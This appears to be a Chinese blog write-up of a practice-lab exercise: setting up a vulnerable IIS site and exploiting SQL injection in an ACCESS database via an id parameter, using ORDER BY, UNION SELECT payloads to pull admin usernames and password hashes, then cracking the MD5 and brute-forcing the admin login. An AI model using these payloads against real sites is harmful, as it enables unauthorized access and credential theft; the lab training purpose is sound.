下载地址:https://pan.baidu.com/s/1y6Gkvo7Wsbwj_zNbaBiCmA 提取码: kjg7
一、靶场搭建
1、将压缩包添到wwwroot目录下
2、 访问iis绑定的ip地址
二、ACCESS注入
1、判断注入点
点击新闻中心,发现一个?id参数 输入' 发现报错,输入' and 1=2, 发现报错,输入' and 1=1,页面正常,说明存在注入点
2、判断列数
输入 ' order by 8 报错,输入 'order by 7 不报错,所以有7列
3、猜测表名
and exists(select * from 表名)
4、判断回显位置
union select 1,2,3,4,5,6,7 from 表名
5、猜测字段名
union select 1,username,3,4,5,6,7 from administrator,报错,说明没有usernam字段
union select 1,user_name,3,4,5,6,7 from administrator,页面回显结果,说明有user_name字段
union select 1,user_name,password,4,5,6,7 from administrator,尝试查看也,页面回显,说明存在password字段
6、将密码进行MD5解密
爆破后台登录地址
输入用户密码登录后台
标签:administrator,回显,union,ACCESS,报错,输入,靶场,select,搭建 From: https://blog.csdn.net/m0_73771249/article/details/141353554